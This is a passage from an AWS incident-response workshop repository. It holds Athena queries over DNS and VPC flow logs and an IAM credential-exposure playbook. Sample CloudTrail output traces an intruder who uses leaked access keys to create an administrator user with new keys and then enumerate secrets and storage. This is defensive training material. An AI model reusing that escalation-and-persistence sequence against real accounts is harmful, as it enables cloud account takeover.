'2020/07/01' 78 | AND date_partition <= '2020/07/31' 79 | AND account_partition = '111122223333' 80 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 81 | GROUP BY query_name, query_type 82 | ORDER BY query_count DESC; 83 | 84 | -- Summary with count of each time a AAAA record name name queried 85 | SELECT query_name, query_type, count(*) as query_count FROM "irworkshopgluedatabase"."irworkshopgluetabledns" 86 | WHERE query_type <> 'AAAA' 87 | AND date_partition >= '2020/07/01' 88 | AND date_partition <= '2020/07/31' 89 | AND account_partition = '111122223333' 90 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 91 | GROUP BY query_name, query_type 92 | ORDER BY query_count DESC; 93 | 94 | -- Summary with count of each time a AAAA record name name queried 95 | -- split out TLD and SLD (note: doesn't properly handle TLDs containing a '.' (e.g. .com.br) 96 | SELECT element_at(split(query_name,'.'),-2) AS tld, 97 | element_at(split(query_name,'.'),-3) AS sld, 98 | query_name, query_type, 99 | count(*) AS query_count 100 | FROM "irworkshopgluedatabase"."irworkshopgluetabledns" 101 | WHERE query_type <> 'AAAA' 102 | AND date_partition >= '2020/07/01' 103 | AND date_partition <= '2020/07/31' 104 | AND account_partition = '111122223333' 105 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 106 | GROUP BY query_name, query_type 107 | ORDER BY query_count DESC; 108 | 109 | -- Get records that that resolve to a specific IP 110 | SELECT * FROM "irworkshopgluedatabase"."irworkshopgluetabledns" 111 | WHERE contains(transform(answers, x-> x.rdata), '203.0.113.2') 112 | AND date_partition >= '2020/07/01' 113 | AND date_partition <= '2020/07/31' 114 | AND account_partition = '111122223333' 115 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003'); 116 | -------------------------------------------------------------------------------- /analytics/vpcflow/vpcflow_demo_queries.sql: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | SPDX-License-Identifier: MIT-0 4 | */ 5 | 6 | -- PREVIEW TABLE 7 | -- preview first 10 rows with all fields, quick way to verify everything is setup correctly 8 | 9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 10 | LIMIT 10; 11 | 12 | -- PARTITION TESTS 13 | /* NOTE: if there are no constraints a partition (account, region, or date) then by default ALL data will be scanned 14 | this could lead to costly query, always consider using at least one partition constraint. 15 | 16 | Note that this is the case even if you have other constraints in a query (e.g. sourceaddress = '192.0.2.1'), 17 | only constraints using partition fields (date_partition, region_partition, account_partition) 18 | will limit the amount of data scanned. 19 | */ 20 | 21 | -- preview first 10 rows with all fields, limited to a single account 22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 23 | WHERE account_partition = '111122223333' 24 | LIMIT 10; 25 | 26 | -- preview first 10 rows with all fields, limited to multiple accounts 27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 28 | WHERE account_partition in ('111122223333','444455556666','123456789012') 29 | LIMIT 10; 30 | 31 | -- preview first 10 rows with all fields, limited to a single region 32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 33 | WHERE region_partition = 'us-east-1' 34 | LIMIT 10; 35 | 36 | -- preview first 10 rows with all fields, limited to multiple regions 37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 38 | WHERE region_partition in ('us-east-1','us-east-2','us-west-2') 39 | LIMIT 10; 40 | 41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string 42 | -- preview first 10 rows with all fields, limited to a certain date range 43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 44 | WHERE date_partition >= '2020/07/01' 45 | AND date_partition <= '2020/07/31' 46 | LIMIT 10; 47 | 48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative) 49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d') 51 | LIMIT 10; 52 | 53 | -- preview first 10 rows with all fields, limited by a combination partition constraints 54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost 55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 56 | WHERE date_partition >= '2020/07/01' 57 | AND date_partition <= '2020/07/31' 58 | AND account_partition = '111122223333' 59 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 60 | LIMIT 10; 61 | 62 | -- ANALYSIS EXAMPLES 63 | -- NOTE: default partition constraints have been provided for each query, 64 | -- be sure to add the appropriate partition constraints to the WHERE clause as shown above 65 | /* 66 | DEFAULT partition constraints: 67 | WHERE date_partition >= '2020/07/01' 68 | AND date_partition <= '2020/07/31' 69 | AND account_partition = '111122223333' 70 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 71 | 72 | Be sure to modify or remove these to fit the scope of your intended analysis 73 | */ 74 | 75 | -- Get list source/destination IP pairs ordered by the number of records 76 | SELECT region, instanceid, sourceaddress, destinationaddress, count(*) as record_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 77 | WHERE date_partition >= '2020/07/01' 78 | AND date_partition <= '2020/07/31' 79 | AND account_partition = '111122223333' 80 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 81 | GROUP BY region, instanceid, sourceaddress, destinationaddress 82 | ORDER BY record_count DESC 83 | 84 | -- Get a summary of records between a given source/destination IP pair, ordered by the total number of bytes 85 | SELECT region, instanceid, sourceaddress, destinationaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 86 | WHERE (sourceaddress = '192.0.2.1' OR destinationaddress = '192.0.2.1') 87 | AND (sourceaddress = '203.0.113.2' OR destinationaddress = '203.0.113.2') 88 | AND date_partition >= '2020/07/01' 89 | AND date_partition <= '2020/07/31' 90 | AND account_partition = '111122223333' 91 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 92 | GROUP BY region, instanceid, sourceaddress, destinationaddress 93 | ORDER BY byte_count DESC 94 | 95 | -- Get a summary of the number of bytes sent from port 443 limited to a single instance 96 | -- NOTE: for remote IPs this represents the amount data downloaded from port 443 by the instance, 97 | -- for instance IPs this represents the amount data downloaded by remost hosts from the instance on port 443 98 | SELECT region, instanceid, sourceaddress, sourceport, destinationaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 99 | WHERE instanceid = 'i-000000000000000' 100 | AND sourceport = 443 101 | AND date_partition >= '2020/07/01' 102 | AND date_partition <= '2020/07/31' 103 | AND account_partition = '111122223333' 104 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 105 | GROUP BY region, instanceid, sourceaddress, sourceport, destinationaddress 106 | ORDER BY byte_count DESC 107 | 108 | -- Get a summary of the number of bytes sent to port 443 limited to a single instance 109 | -- NOTE: for remote IPs this represents the amount data uploaded to port 443 by the instance, 110 | -- for instance IPs this represents the amount data uploaded by remost hosts to the instance on port 443 111 | SELECT region, instanceid, sourceaddress, destinationaddress, destinationport, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 112 | WHERE instanceid = 'i-000000000000000' 113 | AND destinationport = 443 114 | AND date_partition >= '2020/07/01' 115 | AND date_partition <= '2020/07/31' 116 | AND account_partition = '111122223333' 117 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 118 | GROUP BY region, instanceid, sourceaddress, destinationaddress, destinationport 119 | ORDER BY byte_count DESC 120 | 121 | -- Get a summary with the number of bytes for each src_ip,src_port,dst_ip,dst_port quad across all records to or from a specific IP 122 | SELECT sourceaddress, destinationaddress, sourceport, destinationport, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 123 | WHERE (sourceaddress = '192.0.2.1' OR destinationaddress = '192.0.2.1') 124 | AND date_partition >= '2020/07/01' 125 | AND date_partition <= '2020/07/31' 126 | AND account_partition = '111122223333' 127 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 128 | GROUP BY sourceaddress, destinationaddress, sourceport, destinationport 129 | ORDER BY byte_count DESC 130 | 131 | -- Get all flow records between two IPs showing flow_direction (requires v5 flow-direction field to be enabled) 132 | SELECT from_unixtime(starttime) AS start_time, 133 | from_unixtime(endtime) AS end_time, 134 | interfaceid, 135 | sourceaddress, 136 | destinationaddress, 137 | sourceport, 138 | destinationport, 139 | numpackets, 140 | numbytes, 141 | flow_direction, 142 | action 143 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 144 | WHERE (sourceaddress = '192.0.2.1' 145 | AND destinationaddress = '192.0.2.254') 146 | OR (sourceaddress = '192.0.2.254' 147 | AND destinationaddress = '192.0.2.1') 148 | ORDER BY starttime ASC 149 | 150 | -- List when source ips were first seen / last seen with a summary of destination ip/instances/ports 151 | SELECT sourceaddress, 152 | min(starttime) AS first_seen, 153 | max(endtime) AS last_seen, 154 | array_agg(DISTINCT(destinationaddress)), 155 | array_agg(DISTINCT(instanceid)), 156 | array_agg(DISTINCT(destinationport)) 157 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 158 | WHERE destinationport < 32768 -- skip ephemeral ports, since we're looking for inbound connections to service ports 159 | AND date_partition >= '2020/07/01' 160 | AND date_partition <= '2020/07/31' 161 | AND account_partition = '111122223333' 162 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 163 | GROUP BY sourceaddress 164 | ORDER by first_seen ASC 165 | 166 | 167 | -- Daily Transfer Report on Top 10 Internal IPs with large transfers, limited to source addresses in network 192.0.2.0/24 168 | SELECT "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress, sum("irworkshopgluedatabase"."irworkshopgluetablevpcflow".numbytes) as byte_count 169 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 170 | INNER JOIN (SELECT sourceaddress, sum(numbytes) as byte_count FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 171 | WHERE sourceaddress like '192.0.2.%' 172 | AND date_partition >= '2020/07/01' 173 | AND date_partition <= '2020/07/31' 174 | AND account_partition = '111122223333' 175 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 176 | GROUP BY region, instanceid, sourceaddress, destinationaddress, destinationport 177 | ORDER BY byte_count DESC 178 | LIMIT 10) as top_n 179 | ON top_n.sourceaddress = "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress 180 | WHERE date_partition >= '2020/07/01' 181 | AND date_partition <= '2020/07/31' 182 | AND account_partition = '111122223333' 183 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 184 | GROUP BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress 185 | ORDER BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".event_date ASC, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress ASC, "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress ASC, byte_count DESC -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | 5 | import aws_cdk 6 | from workshop_stack import WorkshopStack 7 | 8 | app = aws_cdk.App() 9 | 10 | workshop_stack = WorkshopStack(app, "WorkshopStack") 11 | 12 | app.synth() 13 | -------------------------------------------------------------------------------- /cdk.json: -------------------------------------------------------------------------------- 1 | { 2 | "app": "python app.py", 3 | "context": { 4 | "@aws-cdk/aws-iam:minimizePolicies": true 5 | } 6 | } -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "aws-incident-response-playbooks-workshop", 3 | "version": "1.0", 4 | "description": "AWS CDK application supporting Incident Response Playbooks Development", 5 | "main": "setup.js", 6 | "author": "AWS Professional Services", 7 | "license": "MIT-0", 8 | "dependencies": { 9 | "aws-cdk": "2.128" 10 | } 11 | } -------------------------------------------------------------------------------- /playbooks/README.md: -------------------------------------------------------------------------------- 1 | ## Workshop Playbook Samples 2 | 3 | These playbooks have been created for the purposes of this workshop: 4 | * credential_exposure/IAM_credentials_exposure.md - IAM User Access Key publicly exposed 5 | * crypto_mining/EC2_crypto_mining.md - EC2 instance compromised and used for crypto mining 6 | * the repository contains the simulation script and the "solution" playbook 7 | * template/use_case.md - generic template to develop new playbook use case 8 | 9 | The [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) (Special Publication 800-61 Revision 2) provides guidelines for: 10 | * Preparation for incidents 11 | * Gathering and analyzing evidence from an incident 12 | * Containment, eradication, and recovery from an incident 13 | * Perform post-incident activities after response closure 14 | 15 | 16 | -------------------------------------------------------------------------------- /playbooks/credential_exposure/IAM_credential_exposure.md: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | PLEASE NOTE THIS PLAYBOOK USES FICTITIOUS ENTITIES SUCH AS ```AKIAIOSFODNN7EXAMPLE``` FOR *IAM ACCESS KEY ID*, ```198.51.100.77``` FOR *IP ADDRESS*, AND ARBITRARY *DATE RANGES* FOR ATHENA QUERIES AND AWS CLI COMMANDS. YOU WILL NEED TO REPLACE THOSE WITH ACTUALS FROM THE AWS ACCOUNT YOU ARE USING. 4 | 5 | --- 6 | 7 | # IAM credential exposure playbook 8 | 9 | ## Preparation 10 | 11 | ### The threat 12 | 13 | This playbook covers the detection of exposed IAM credentials in the form of *IAM Access Keys* or *IAM User and password combination*. It does not cover *AWS account root user*. If a non-authorized actor has a copy of those credentials, they can perform any action in your account permitted by the policies associated with those credentials, such as launching an Amazon EC2 instance and storing objects in Amazon S3. Privileges could be escalated either by exploiting vulnerabilities or misuse of ancillary entitlements. Detective controls for exposed IAM credentials should be defined and implemented based on threat modeling, e.g. notification from third party, Data Loss Prevention (DLP) systems, or unusual AWS API call activity (deterministic(*) or AI/ML based). 14 | 15 | (*) Deterministic based means using a static rule, e.g. EC2 RunInstances API CALL is made by a IP address belonging to CIDR 198.51.100.0/24 using permanent access keys with user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246”. 16 | 17 | ### Objectives 18 | 19 | Throughout the execution of the playbook, focus on the _***desired outcomes***_, taking notes for enhancement of incident response capabilities. 20 | 21 | #### Determine: 22 | 23 | * **Vulnerabilities exploited** 24 | * **Exploits and tools observed** 25 | * **Actor's intent** 26 | * **Actor's attribution** 27 | * **Damage inflicted to the environment and business** 28 | 29 | #### Recover: 30 | 31 | * **Return to original and hardened configuration** 32 | 33 | #### Enhance CAF Security Perspective components: 34 | [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf) 35 | * **Directive** 36 | * **Detective** 37 | * **Responsive** 38 | * **Preventative** 39 | 40 | ![Image](images/aws_caf.png) 41 | * * * 42 | 43 | 44 | ### Response Steps 45 | 46 | 1. [**ANALYSIS**] Validate alert by checking ownership of exposed credential 47 | 2. [**ANALYSIS**] Identity exposed credential owner/custodian 48 | 3. [**CONTAINMENT**] Disable exposed credential if approved by owner/customer 49 | 4. [**ANALYSIS**] Use Athena to pull 15 days of exposed credential activity from CloudTrail logs 50 | 5. [**ANALYSIS**] Use Athena to pull 15 days of source IP addresses used by exposed credential from VPC Flow logs 51 | 6. [**ANALYSIS**] Establish reputation for source IP addresses 52 | 7. [**ANALYSIS**] Determine which source IP addresses were used against infrastructure resources such as EC2 instances, RDS databases 53 | 8. [**ANALYSIS**] Discover all resources provisioned, modified, and deleted by the exposed credential based on CloudTrail logs 54 | 9. [**CONTAINMENT**] Perform containment of all rogue resources provisioned by the exposed credential 55 | 10. [**CONTAINMENT**] Perform containment of existing resources modified by the exposed credentials with approval from owner/custodian 56 | 11. [**ANALYSIS**] Repeat steps 4 to 10 for IAM principals created by the exposed credential 57 | 11. [**ANALYSIS**] Determine if data was exfiltrated, modified, or deleted. Figure out the classification for all data sets touched. 58 | 12. [**ANALYSIS**] Expand log scope to 90 days or further and repeat steps 1-12. Use your judgment on how far back to go. 59 | 13. [**ANALYSIS**] Estimate attribution and attack type (targeted or opportunistic) 60 | 14. [**ANALYSIS**] Preserve all relevant infrastructure and service resources for forensics investigation 61 | 15. [**ERADICATION**] Perform eradication (delete rogue resources, apply security updates and harden configuration) 62 | 16. [**RECOVERY**] Perform recovery by restoring system data and rebuilding components 63 | 17. [**POST-INCIDENT ACTIVITY**] Perform post-incident activity for preparation enhancement 64 | 65 | 66 | ***The response steps follow the Incident Response Life Cycle from NIST Special Publication 800-61r2 67 | [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) 68 | ![Image](images/nist_life_cycle.png)*** 69 | 70 | 71 | ### Incident Classification & Handling 72 | 73 | * **Tactics, techniques, and procedures**: Exfiltration of credentials 74 | * **Category**: IAM credential exposure 75 | * **Resource**: IAM 76 | * **Roles to Assume**: 77 | * **SecurityAnalystRole**: provides Athena querying and GuardDuty R/O access 78 | * **AthenaAdminRole**: configure and maintain Athena 79 | * **SecurityDeployRole**: deploy AWS CDK app or CloudFormation stacks 80 | * **SecurityBreakGlassRole**: account administrator, for any incident response related activity requiring elevation upon approval 81 | * **Tooling**: [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/index.html) (CLI), [Amazon Athena](https://docs.aws.amazon.com/athena/latest/ug/querying-AWS-service-logs.html) 82 | * **Indicators**: Cyber Threat Intelligence, Third Party Notice 83 | * **Log Sources**: AWS CloudTrail, AWS Config, VPC Flow Logs, Amazon GuardDuty 84 | * **Teams**: Security Operations Center (SOC), Forensic Investigators, Cloud Engineering 85 | 86 | * * * 87 | 88 | ### Activity simulated for this playbook 89 | 90 | The file ```simulation/simulate_credential_exposure_activity.sh``` is a bash script using AWS CLI simulating an actor using IAM User Access Keys for reconnaissance, elevation of privileges, and persistence. 91 | 92 | * * * 93 | 94 | ### IAM entitlements used for this playbook 95 | 96 | The following IAM Roles are available in the AWS account to assume 97 | 98 | #### SecurityAnalystRole 99 | - For Athena queries: custom IAM Policy 100 | - To perform analysis tasks: [ReadOnlyAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/ReadOnlyAccess) 101 | 102 | #### SecurityDeployRole 103 | - For resource deployment using CloudFormation 104 | 105 | #### SecurityBreakGlassRole 106 | - To perform containment, and eradication tasks: [AdministratorAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/AdministratorAccess) 107 | 108 | #### SecurityAdminRole 109 | - To perform security tool administrative tasks such as Athena or GuardDuty administration: customer IAM Policy 110 | 111 | ## Assuming Roles: 112 | - CloudShell provides a Linux shell environment with temporary credentials associated with the current IAM Role you are signed in to the console. The AWS CLI will use these session tokens by default. 113 | - Alternatively you can install the AWS CLI in Windows, Linux, and MacOS and configure multiple IAM Roles to be assumed using the `-- profile` parameter. 114 | 115 | **All examples in this playbook use the `--profile` parameter to indicate the IAM Role required for the AWS CLI command. If you use CloudShell, remove the `--profile` parameter from the AWS CLI call.** 116 | 117 | * * * 118 | 119 | 120 | ## Incident Handling Process 121 | 122 | ### The incident response process has the following stages: 123 | 124 | * Part 1: Analysis - Validation 125 | * Part 2: Analysis - Scope 126 | * Part 3: Analysis - Impact 127 | * Part 4: Containment 128 | * Part 5: Eradication 129 | * Part 6: Recovery 130 | * Part 7: Post-Incident Activity 131 | 132 | * * * 133 | 134 | ### Part 1: Analysis - Validation 135 | 136 | IAM Access Key with id AKIAIOSFODNN7EXAMPLE was found in plain text in a public git repository. 137 | 138 | There are no technical detective controls to validate, therefore, check ownership of the IAM Access Key ID using the AWS CLI: 139 | ``` 140 | aws sts get-access-key-info --access-key-id AKIAIOSFODNN7EXAMPLE --profile SecurityAnalystRole --region us-east-1 141 | { 142 | "Account": "777777777777" 143 | } 144 | ``` 145 | 146 | If AWS account 777777777777 is owned by you, continue to Analysis, otherwise inform [AWS Trust and Safety Team](https://aws.amazon.com/premiumsupport/knowledge-center/report-aws-abuse/) of the found IAM Access Key ID. 147 | 148 | * * * 149 | 150 | ### Part 2: Analysis - Scope 151 | 152 | Assume the SecurityAnalystRole on the AWS account hosting the Athena workgroup IRWorkshopWorkgroup. 153 | 154 | 1. Retrieve past 7 days of the following activity for IAM Access Key ID AKIAIOSFODNN7EXAMPLE: 155 | * Service activity (API calls) from CloudTrail logs 156 | * Infrastructure and application network activity from VPC Flow logs based on the source IP addresses used for API calls 157 | 2. Establish reputation for source IP address list: 158 | * Use internal and external threat intelligence 159 | * Who owns the source IP addresses used? 160 | 3. Using API call history, determine resources created, modified, deleted, and probed: 161 | 4. Document resource inventory by AWS Service and call made 162 | 163 | #### Athena Queries and AWS CLI calls 164 | 165 | 166 | ``` 167 | -- retrieve past 7 days of API calls 168 | SELECT awsregion, eventsource, eventname, readonly, errorcode, errormessage, count(eventid) as COUNT 169 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 170 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 171 | AND date_partition >= '2021/07/16' 172 | AND date_partition <= '2021/07/24' 173 | GROUP BY awsregion, eventsource, eventname, readonly, errorcode, errormessage 174 | ORDER BY COUNT DESC 175 | ``` 176 | 177 | ``` 178 | awsregion | eventsource | eventname | readonly | errorcode | errormessage | COUNT 179 | -----------|---------------------|---------------------|------------|-------------|----------------|------- 180 | us-east-1 | sts.amazonaws.com | GetCallerIdentity | true | | | 1 181 | us-east-1 | iam.amazonaws.com | AttachUserPolicy | false | | | 1 182 | us-east-1 | iam.amazonaws.com | CreateUser | false | | | 1 183 | us-east-1 | iam.amazonaws.com | CreateAccessKey | false | | | 1 184 | ``` 185 | 186 | 187 | ``` 188 | -- retrieve past 7 days of source IP addresses and user agents used for API calls 189 | SELECT sourceipaddress, useragent, count(eventid) as COUNT 190 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 191 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 192 | AND date_partition >= '2021/07/16' 193 | AND date_partition <= '2021/07/24' 194 | GROUP BY sourceipaddress, useragent 195 | ORDER BY COUNT DESC 196 | ``` 197 | 198 | 199 | sourceipaddress | useragent | COUNT 200 | -----------------|--------------------------------------------------------------------------------------------------|------- 201 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.create-access-key | 1 202 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/sts.get-caller-identity | 1 203 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.attach-user-policy | 1 204 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.create-user | 1 205 | 206 | 207 | ``` 208 | -- retrieve past 7 days of infrastructure and application network activity 209 | SELECT "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, 210 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress, 211 | count(*) as count 212 | FROM "irworkshopgluedatabase"."irworkshopgluetablevpcflow" 213 | INNER JOIN "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 214 | ON ("irworkshopgluedatabase"."irworkshopgluetablecloudtrail".sourceipaddress = 215 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress) 216 | OR 217 | ("irworkshopgluedatabase"."irworkshopgluetablecloudtrail".sourceipaddress = 218 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress) 219 | WHERE "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 220 | AND "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".date_partition >= '2021/07/16' 221 | AND "irworkshopgluedatabase"."irworkshopgluetablecloudtrail".date_partition <= '2021/07/24' 222 | GROUP BY "irworkshopgluedatabase"."irworkshopgluetablevpcflow".sourceaddress, 223 | "irworkshopgluedatabase"."irworkshopgluetablevpcflow".destinationaddress 224 | ORDER BY count DESC 225 | ``` 226 | 227 | ``` 228 | Zero records returned. 229 | ``` 230 | 231 | #### Analysis of Athena query results: 232 | 233 | * The actor performed changes to the services with the API calls AttachUserPolicy, CreateUser, and CreateAccessKey. They probed services using GetCallerIdentity. 234 | 235 | * Source IP address reputation: 236 | * ExoneraTor: The ExoneraTor service maintains a database of IP addresses that have been part of the Tor network. 237 | * https://metrics.torproject.org/exonerator.html?ip=198.51.100.77×tamp=2021-07-24&lang=en 238 | * Greynoise: 239 | * IP reputation service 240 | * https://www.greynoise.io/viz/query/?gnql=198.51.100.77 241 | * Whois: 242 | * There are several options to acquire WHOIS information, here is one directly from CLI for one of the IP addresses 243 | * ```whois 198.51.100.77``` 244 | * No infrastructure and application network activity was detected. 245 | 246 | #### Additional Athena queries: 247 | 248 | * We need to analyze the changes made with the AttachUserPolicy, CreateUser, and CreateAccessKey API calls. 249 | 250 | ``` 251 | -- retrieve additional information about changes made to the services 252 | SELECT eventtime, awsregion, eventname, requestparameters, responseelements, errorcode, errormessage 253 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 254 | WHERE useridentity.accesskeyid = 'AKIAIOSFODNN7EXAMPLE' 255 | AND date_partition >= '2021/07/16' 256 | AND date_partition <= '2021/07/24' 257 | AND eventname IN ('AttachUserPolicy', 'CreateUser', 'CreateAccessKey') 258 | ``` 259 | 260 | eventtime | awsregion | eventname | requestparameters | responseelements | errorcode | errormessage 261 | ----------------------|-------------|--------------------|--------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------|-------------- 262 | 2021-07-24T02:22:32Z | us-east-1 | CreateUser | {"userName":"JaneDoe"} | {"user":{"path":"/","userName":"JaneDoe","userId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::777777777777:user/JaneDoe","createDate":"Jul 24, 2021 2:22:32 AM"}} | | 263 | 2021-07-24T02:22:34Z | us-east-1 | CreateAccessKey | {"userName":"JaneDoe"} | {"accessKey":{"userName":"JaneDoe","accessKeyId":"AKIAI44QH8DHBEXAMPLE","status":"Active","createDate":"Jul 24, 2021 2:22:34 AM"}} | | 264 | 2021-07-24T02:22:33Z | us-east-1 | AttachUserPolicy | {"userName":"JaneDoe","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"} | null | | 265 | 266 | 267 | * The IAM User ```JaneDoe``` was created with the AWS managed policy ```AdministratorAccess``` attached and Access Key ID ```AKIAI44QH8DHBEXAMPLE```. 268 | 269 | ``` 270 | -- retrieve API call activity of rogue user 271 | SELECT awsregion, eventsource, eventname, readonly, errorcode, errormessage, count(eventid) as COUNT 272 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 273 | WHERE useridentity.username = 'JaneDoe' 274 | AND date_partition >= '2021/07/16' 275 | AND date_partition <= '2021/07/24' 276 | GROUP BY awsregion, eventsource, eventname, readonly, errorcode, errormessage 277 | ORDER BY COUNT DESC 278 | ``` 279 | 280 | awsregion | eventsource | eventname | readonly | errorcode | errormessage | COUNT 281 | -----------|--------------------------------|-------------------------|------------|-------------|----------------|------- 282 | us-east-1 | sts.amazonaws.com | GetCallerIdentity | true | | | 2 283 | us-east-1 | iam.amazonaws.com | ListRoles | true | | | 1 284 | us-east-1 | logs.amazonaws.com | DescribeDestinations | true | | | 1 285 | us-east-1 | s3.amazonaws.com | CreateBucket | false | | | 1 286 | us-east-1 | kms.amazonaws.com | ListKeys | true | | | 1 287 | us-east-1 | lambda.amazonaws.com | ListFunctions20150331 | true | | | 1 288 | us-east-1 | s3.amazonaws.com | ListBuckets | true | | | 1 289 | us-east-1 | secretsmanager.amazonaws.com | ListSecrets | true | | | 1 290 | us-east-1 | kms.amazonaws.com | ListAliases | true | | | 1 291 | us-east-1 | s3.amazonaws.com | PutObject | false | | | 1 292 | us-east-1 | ec2.amazonaws.com | DescribeInstances | true | | | 1 293 | 294 | ``` 295 | -- retrieve rogue user source IP addresses and user agents used for API calls 296 | SELECT sourceipaddress, useragent, count(eventid) as COUNT 297 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 298 | WHERE useridentity.username = 'JaneDoe' 299 | AND date_partition >= '2021/07/16' 300 | AND date_partition <= '2021/07/24' 301 | GROUP BY sourceipaddress, useragent 302 | ORDER BY COUNT DESC 303 | ``` 304 | 305 | sourceipaddress | useragent | COUNT 306 | -----------------|------------------------------------------------------------------------------------------------------|------- 307 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/sts.get-caller-identity | 2 308 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/lambda.list-functions | 1 309 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/ec2.describe-instances | 1 310 | 198.51.100.77 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.put-object] | 1 311 | 198.51.100.77 